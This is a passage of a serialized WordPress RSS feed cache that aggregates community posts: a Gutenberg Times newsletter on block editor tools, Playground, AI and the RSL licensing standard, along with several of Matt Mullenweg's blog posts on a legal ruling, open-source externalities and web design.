style=\"height: 1em;\" /> The latest episode is <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-120-wordcamp-us-telex-gutenberg-21-4-and-21-5/\">Gutenberg Changelog 120—WordCamp US, Automattic Telex, Gutenberg 21.4 and 21.5, and the need for more blocks</a> with special guest <strong>Sarah Norris. </strong></p>\n\n\n\n<figure class=\"wp-block-image size-full is-style-no-vertical-margin\"><img alt=\"\" class=\"wp-image-41771\" height=\"207\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-05-at-14.12.23-edited.png?resize=652%2C207&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<p class=\"has-small-font-size\"><em>If you are listening via Spotify, please leave a comment. If you listen via other podcast apps, please leave a review. It&#8217;ll help with the distribution.</em></p>\n</div></div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</h2>\n\n\n\n<p>In her latest post, <a href=\"https://wordpress.com/blog/2025/09/10/pattern-system-wordpress-publishing-workflow/\"><strong>The Pattern System: Publish Faster with Reusable WordPress Layouts</strong></a>, <strong>Anam Hassan</strong> breaks down how WordPress Patterns can save you tons of time by letting you reuse the same layouts over and over instead of rebuilding them from scratch. She explains three types: synced patterns that automatically update everywhere when you change them once, unsynced patterns that give you the same starting template but let you customize each one differently, and locked patterns that keep your design safe when other people are writing content. </p>\n\n\n\n<p><a href=\"https://developer.wordpress.org/news/2024/06/an-introduction-to-overrides-in-synced-patterns/\">Synced pattern overrides</a> are however missing from the post.  </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>Tune in to the latest episode of the <em>WP Behind the Builds</em> podcast on Open Channels. <a href=\"https://openchannels.fm/the-founders-of-podcaster-plus-share-product-development-experiences-and-community-insights/\"><strong>The Founders of Podcaster Plus Share Product Development Experiences and Community Insights</strong></a>. Host <strong>Mark Westguard</strong> speaks with <strong>Dan Maby</strong> and <strong>Nathan Wrigley</strong>, founders of Podcaster Plus, about their new WordPress plugin designed to simplify podcast publishing and customize audio players. The plugin uses the Interactivity API for modular blocks like play buttons and volume controls, enabling users to create personalized audio players. Podcaster Plus automates publishing by generating posts for new episodes in RSS feeds and offers add-ons for custom post types, SEO, and automation. </p>\n\n\n\n<p><em>You can sign up for the beta of the new plugin at the website <a href=\"https://www.podcasterplus.com/\">PodcasterPlus.</a></em></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>At WordCamp Sofia last year, <strong>Jordan Hlebarov</strong> explored in his talk <a href=\"https://wordpress.tv/2025/08/15/gutenberg-in-action-how-the-block-editor-simplifies-client-workflows-and-boosts-agency-efficiency/\"><strong>how the Gutenberg block editor simplifies the workflow for both agencies and clients</strong></a>, by making content management more intuitive and efficient, as well as how it benefits both clients and streamlines agency operations. The <a href=\"https://wordpress.tv/2025/08/15/gutenberg-in-action-how-the-block-editor-simplifies-client-workflows-and-boosts-agency-efficiency/\">video</a> is now available on WordPressTV and also offers <a href=\"https://sofia.wordcamp.org/2024/files/2025/05/hlebarov-WordCamp-Sofia-2024-1.pdf\">a link to the slides</a>.</p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</h2>\n\n\n\n<p>On the <em>WordPress Developer Blog</em>, Justin Tadlock published an in-depth tutorial on <a href=\"https://developer.wordpress.org/news/2025/09/building-a-light-dark-toggle-with-the-interactivity-api/\"><strong>Building a light/dark toggle with the Interactivity API</strong></a>. He demonstrates creating a toggle that works without custom blocks using modern CSS techniques and WordPress APIs. The tutorial covers theme setup, color scheme storage using user meta and cookies, implementing the toggle button with interactivity directives, adding JavaScript functionality, styling with icons, and registering a block variation for easy editor insertion, resulting in a complete light/dark mode toggle for block themes. <em>You can <a href=\"https://blockdevelopercookbook.com/recipes/block-transforms/\">follow along on the Block Developer Cook Book website. </a></em></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><a href=\"https://x.com/RinodeBoer\"><strong>Rino de Boer</strong></a> normally uses Elementor to build sites. Recently he explored Block themes and the 2025 default theme. You can follow along via his YouTube video <strong><a href=\"https://www.youtube.com/watch?v=fl-YZtMZsTc\">Exploring WordPress Block Themes (Spectra, Raft, Ollie, TT5 &amp; more) — Live Test</a></strong></p>\n\n\n<div class=\"wp-block-newsletterglue-showhide ng-block\" width=\"100%\">\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n\n</div></figure>\n</div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Jason Crist</strong> published a new plugin: <a href=\"https://wordpress.org/plugins/synced-patterns-for-themes/\"><strong>Synced Patterns for Themes.</strong></a> He writes in the description, &#8220;This plugin enables theme developers to ship patterns that behave as synced patterns (reusable blocks) while maintaining the benefits of theme-bundled patterns. When a theme pattern is marked as synced, it automatically becomes available as a reusable block that updates across all instances when modified.&#8221; The plugin description also elaborates on the features and how to use it. </p>\n\n\n\n<p>Crist also authored the <strong><a href=\"https://wordpress.org/plugins/pattern-builder/\">Pattern Builder</a></strong> plugin, you can also find in the repository. &#8220;Pattern Builder transforms how you work with WordPress block patterns, providing a comprehensive solution for creating, managing, and organizing patterns right from your WordPress admin.&#8221; </p>\n\n\n\n<p><em>I have not tested these plugins. Use at your own risk!</em></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Bud Kraus </strong>again has a great tutorial to unregister all kinds of core block features, i.e., block styles, blocks, or theme style variations. He shows you example code and also what happens when things are unregistered that were already in use. Check out his blog post on Kinsta: <a href=\"https://kinsta.com/blog/unregister-style-variations/\"><strong>Unregistering style variations in a WordPress block theme.</strong></a></p>\n\n\n<section class=\"wp-block-newsletterglue-callout undefined not-color-set\" style=\"border-color: #f9f9e5; border-radius: 22px; border-style: solid; border-width: 0; padding-top: 20px; padding-bottom: 20px; padding-left: 20px; padding-right: 20px; text-align: left; margin-left: 0; margin-right: 0; margin-top: 0px; margin-bottom: 0px; background-color: #f9f9e5;\">\n<p><strong> <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" rel=\"noreferrer noopener\" target=\"_blank\">&#8220;Keeping up with Gutenberg &#8211; Index 2025&#8221;</a> </strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test, and Meta team from Jan. 2024 on. Updated by yours truly. The previous years are also available: <strong><strong><a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2020/\">2020</a> | <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2021/\">2021</a></strong> | <strong><a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2022/\">2022</a></strong></strong> | <strong><a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/gutenberg-index-2023\">2023</a></strong> | <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/gutenberg-index-2024/\"><strong>2024</strong></a></p>\n</section>\n\n\n<h2 class=\"wp-block-heading\" id=\"3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor.</h2>\n\n\n\n<p><strong>Ryan Welcher</strong> chips away at his Block Development Cookbook series on YouTube. In the video <a href=\"https://www.youtube.com/watch?v=kBORsxDzwu0\"><strong>How To Convert WordPress Blocks Into (Almost) Anything!</strong></a>, you learn how to enable transforms for your blocks, a way to migrate a current block into a different block. The block editor has a few transforms out of the box, like changing the content of a paragraph block into a list block. Or a into a Quote block without losing the content. Ryan helps you solve this using the transform API for your custom blocks.</p>\n\n\n<div class=\"wp-block-newsletterglue-showhide ng-block\" width=\"100%\">\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n\n</div></figure>\n</div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<h2 class=\"wp-block-heading\" id=\"new-in-the-playground-world\">New in the Playground world</h2>\n\n\n\n<p>In his post, <a href=\"https://www.pootlepress.com/2025/08/no-servers-no-installs-just-a-link-and-a-complete-wordpress-site-appears/\"><strong>The future of WordPress? A complete website from nothing but a link, </strong></a> <strong>Jamie Marsland</strong> explores how WordPress Playground runs entirely in your browser without servers or setup, and Blueprints transform it from a demo into a powerful tool. Blueprints are recipes that create complete professional websites with one click, benefiting agencies, educators, freelancers, and developers. Marsland built <a href=\"https://pootleplayground.com/\">PootlePlayground.com</a> and <a href=\"https://PootleSites.com\">PootleSites.com</a> to expand Blueprint creation capabilities. The future roadmap aims to push these temporary browser sites into permanent hosting.</p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"ai-news\">AI News</h2>\n\n\n\n<p>In his post, <a href=\"https://sethrubenstein.info/2025/09/12/boosting-wordpress-development-with-github-copilot/\"><strong>Boosting WordPress Development with GitHub Copilot</strong></a>, <strong>Seth Rubenstein</strong> explains how GitHub Copilot, an AI coding assistant, helped his team quickly build four WordPress features that would have taken months to complete manually. The AI handled tasks like creating admin panels and fixing SEO titles with minimal human oversight. However, the AI couldn&#8217;t test its own work, so Rubenstein integrated WordPress Playground, a browser-based testing environment, allowing the AI to actually browse and check the websites it builds, making the development process more reliable and efficient. Rubenstein shared all the details of how he accomplished it. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Matt Mullenweg</strong> <a href=\"https://ma.tt/2025/09/really-simple-licensing/\">shared</a> on his blog, &#8220;one of the more interesting things to launch.&#8221; this week: </p>\n\n\n\n<p><a href=\"https://rslstandard.org/\"><strong>RSL (Really Simple Licensing)</strong></a> is an open standard that helps content publishers protect their rights in the AI era by embedding machine-readable licensing terms directly into web pages using XML markup. </p>\n\n\n\n<p>The system supports various compensation models, including attribution-based licensing, pay-per-crawl, and pay-per-inference arrangements. Publishers can specify different terms for different usage types, particularly for AI training applications. </p>\n\n\n\n<p>The standard addresses challenges content creators face with AI systems using their work without clear compensation or attribution by providing a structured format that automated tools can understand and respect, giving creators standardized control over their content usage. </p>\n\n\n\n<p>The founders are <strong>Eckart Walther</strong>, who is also the co-creator of the RSS (Really Simple Syndication) standard, and <strong>Doug Leeds</strong>, former CEO of Ask.com and former CEO of IAC Publishing. </p>\n\n\n\n<p>The RSL team has established a collective licensing organization, the <a href=\"https://rslcollective.org/\">RSL Collective,</a> that can negotiate terms and collect royalties, similar to ASCAP for musicians or MPLC for films. </p>\n\n\n\n<p><strong>Russell Brandom</strong> at TechCrunch has the whole story. <a href=\"https://techcrunch.com/2025/09/10/rss-co-creator-launches-new-protocol-for-ai-data-licensing/\"><strong>RSS co-creator launches new protocol for AI data licensing. </strong></a></p>\n\n\n\n<p><strong>James Le Page</strong>, team rep on the WordPress AI team, built a first version of a plugin for publishers using WordPress: <a href=\"https://github.com/Jameswlepage/rsl-wp\"><strong>RSL Licensing for WordPress</strong></a>. </p>\n\n\n\n<p>And I am left to wonder how public LLMs adhere to this standard and more interestingly, if they will pay licensing fees. Brandom wrote, &#8220;Without some kind of licensing system, AI companies could face an avalanche of copyright lawsuits that <a href=\"https://www.lawfaremedia.org/article/anthropic-s-settlement-shows-the-u.s.-can-t-afford-ai-copyright-lawsuits\" rel=\"noreferrer noopener\" target=\"_blank\">some worry</a> will set the industry back permanently.&#8221; </p>\n\n\n<section class=\"wp-block-newsletterglue-callout undefined not-color-set\" style=\"border-color: #eeeeee; border-radius: 26px; border-style: solid; border-width: 0; padding-top: 20px; padding-bottom: 20px; padding-left: 20px; padding-right: 20px; text-align: left; margin-left: 0; margin-right: 0; margin-top: 0px; margin-bottom: 0px; background-color: #f3efe9;\">\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s master branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. </p>\n\n\n\n<p>Now also available via <a href=\"https://playground.wordpress.net/?blueprint-url=https://gutenbergtimes.com/wp-content/uploads/2020/11/playnightly.json\">WordPress Playground</a>. There is no need for a test site locally or on a server. Have you been using it? <a href=\"mailto:pauli@gutenbergtimes.com\">Email me </a>with your experience</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total?style=for-the-badge\" /></p>\n</section>\n\n\n<p class=\"has-text-align-center has-small-font-size\"><em>Questions? Suggestions? Ideas? </em><br /><em>Don&#8217;t hesitate to send <a href=\"mailto:pauli@gutenbergtimes.com\">them via email</a> or</em><br /><em> send me a message on WordPress Slack or Twitter @bph</em>.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p class=\"has-text-align-center has-small-font-size\">For questions to be answered on the <a href=\"http://gutenbergtimes.com/podcast\">Gutenberg Changelog</a>, <br />send them to <a href=\"mailto:changelog@gutenbergtimes.com\">changelog@gutenbergtimes.com</a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n<section class=\"wp-block-newsletterglue-group\" style=\"padding-top: 10px; padding-bottom: 10px; padding-left: 20px; padding-right: 20px; margin-top: 0px; margin-bottom: 0px;\">\n<p>Featured Image: Photo by Cristina Gottardi on Unsplash</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\n\n\n\n<p class=\"has-text-align-left\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n<form action=\"https://gutenbergtimes.com/feed/\" autocomplete=\"on\" class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\" style=\"margin-bottom: 25px;\"><label class=\"ngl-form-label\" for=\"ngl_email\"><br />Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input autocomplete=\"email\" class=\"ngl-form-input-text\" id=\"ngl_email\" name=\"ngl_email\" required=\"required\" style=\"border-radius: 21px;\" type=\"email\" /></div></div><button class=\"ngl-form-button\" style=\"background-color: #005075; border-color: #005075; border-width: 1px; border-style: solid; color: #ffffff; border-radius: 21px;\" type=\"submit\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too, and won&#8217;t give your email address to anyone <br />except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"><svg fill=\"none\" height=\"24\" stroke=\"#fff\" stroke-width=\"2\" viewBox=\"0 0 24 24\" width=\"24\" xmlns=\"http://www.w3.org/2000/svg\"><polyline points=\"20 6 9 17 4 12\"></polyline></svg></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input id=\"ngl_list_id\" name=\"ngl_list_id\" type=\"hidden\" value=\"26f81bd8ae\" /><input id=\"ngl_double_optin\" name=\"ngl_double_optin\" type=\"hidden\" value=\"yes\" /></form>\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\n</section>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 13 Sep 2025 12:07:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Matt: Legal Win\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149776\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://ma.tt/2025/09/legal-win/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1032:\"<p>Just got word that the<a href=\"https://www.courtlistener.com/docket/69221176/169/wpengine-inc-v-automattic-inc/\"> court dismissed several of WP Engine and Silver Lake’s most serious claims</a> — antitrust, monopolization, and extortion have been knocked out! These were by far the most significant and far-reaching allegations in the case and with today’s decision the case is narrowed significantly. This is a win not just for us but for all open source maintainers and contributors. Huge thanks to the folks at <a href=\"https://www.gibsondunn.com/\">Gibson</a> and <a href=\"https://automattic.com/\">Automattic</a> who have been working on this.</p>\n\n\n\n<p>With respect to any remaining claims, we’re confident the facts will demonstrate that our actions were lawful and in the best interests of the WordPress community.</p>\n\n\n\n<p>This ruling is a significant milestone, but our focus remains the same: building a free, open, and thriving WordPress ecosystem and supporting the millions of people who use it every day.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 13 Sep 2025 01:27:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"Matt: Really Simple Licensing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149763\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://ma.tt/2025/09/really-simple-licensing/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:675:\"<p>It&#8217;s been a busy (and tragic) week but one of the more interesting things to launch was the <a href=\"https://rslstandard.org/\">Really Simple Licensing standard</a>. I have a lot of scars from the web standards wars, so I&#8217;m hesitant to dive back in, but this is from a lot of the early Web 2.0 people, <a href=\"https://techcrunch.com/2025/09/10/rss-co-creator-launches-new-protocol-for-ai-data-licensing/\">as TechCrunch writes about</a>.</p>\n\n\n\n<p>As it happens, <a href=\"https://github.com/Jameswlepage/rsl-wp\">James LePage of Automattic has spun up a WordPress plugin for it</a>, so that was fast. Now the thing to figure out is distribution and adoption.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 12 Sep 2025 05:18:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Matt: Account for Externalities\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149759\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"https://ma.tt/2025/09/externalities/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2454:\"<p>When I studied economics, one of the concepts that struck me the most was the concept of externalities. <a href=\"https://www.imf.org/en/Publications/fandd/issues/Series/Back-to-Basics/Externalities\">This International Monetary Fund post explains it well</a>. In short, externalities are costs or benefits of an economic activity that affect third parties who did not choose to incur them, leading to a divergence between private and social costs or benefits. They’re spillover effects—positive or negative—that the market price fails to reflect. A classic example is air pollution from a factory, where nearby residents bear health and environmental costs not included in the price of the factory’s products.</p>\n\n\n\n<p>Open source is full of externalities. On the positive side, adoption creates ecosystems of developers and provides many paths of distribution. On the negative side, there’s often underinvestment in the very projects that sustain the ecosystem. I have a lot of empathy for why, when open source meets finance and private equity, things can go sideways. You can look at a business built on open source and see seemingly amazing margins—efficient R&amp;D that compounds in a <a href=\"https://en.wikipedia.org/wiki/Discounted_cash_flow\">DCF model</a>. A percent here or there over many years really adds up.</p>\n\n\n\n<p>My plea to investors in open-source businesses is this: when a business is built on top of open source, incorporate a restorative investment percentage back into the projects critical to the end-user experience of what you’re offering customers. In WordPress, we call this <a href=\"https://wordpress.org/five-for-the-future/\">Five for the Future</a>, but it doesn’t have to be five percent; it could be 0.1%. Plan for it when modeling your expected <a href=\"https://en.wikipedia.org/wiki/Internal_rate_of_return\">IRR</a> hurdle from an investment. Then, a few years down the line, when the small percentages start to add up, you won’t face a big catch-up or gap.</p>\n\n\n\n<p>This underinvestment is itself an externality. It doesn’t appear on the balance sheet, but it can manifest in black swan events, such as security breaches or remote code exploits. Technical debt is one of the largest unaccounted-for externalities in the world today. Engineering, in the long run, is primarily a craft of maintenance rather than creation. The bulk of the cost of something comes from its upkeep over time.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 12 Sep 2025 00:58:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Matt: PostHog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://ma.tt/2025/09/posthog/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1235:\"<p>It&#8217;s always fun to see someone pushing the limits of the web experience, <a href=\"https://x.com/photomatt/status/1966026258837549485\">as I reminisced about Flash and Dreamweaver the other day.</a> The new website for <a href=\"https://posthog.com/\">Posthog</a> is a delightful rabbit hole to explore, akin to a <a href=\"https://meowwolf.com/\">Meow Wolf</a>, with meticulous care and craft applied to every corner of the product in a way that is both fun and playful. They even have their own version of  pineapple on pizza.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-149755\" height=\"322\" src=\"https://i0.wp.com/ma.tt/files/2025/09/Screenshot-2025-09-11-at-10.50.28-1024x546.png?resize=604%2C322&#038;quality=80&#038;ssl=1\" width=\"604\" /></figure>\n\n\n\n<p>What I want to enable with <a href=\"https://wordpress.org/\">WordPress</a> is the ability with thousands of plugins and themes for people to have unique, funky experiences like this on their website, while still providing a content structure that&#8217;s legible for interoperability and hacking. Major kudos to <a href=\"https://watilo.com/\">Cory Watilo</a> and <a href=\"https://x.com/james406\">James Hawkins</a> for coming up with this.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 12 Sep 2025 00:09:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"Gutenberg Times: WordPress, AI, and the generational shift: insights from #WCUS Creators Studio\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=41824\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"https://gutenbergtimes.com/wordpress-ai-and-the-generational-shift-insights-from-wcus-creators-studio/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10736:\"<p>Automattic&#8217;s Developer Advocates didn&#8217;t hold back at WordCamp US. <strong>Jonathan Bossenger,</strong> <strong>Brian Coords</strong>, <strong>Birgit Pauli-Haack</strong>, and <strong>Ryan Welcher</strong> sat down for a no-BS roundtable about WordPress&#8217;s future, AI&#8217;s actual role in the CMS world, and the big question: Is WordPress still cool enough for the next generation of 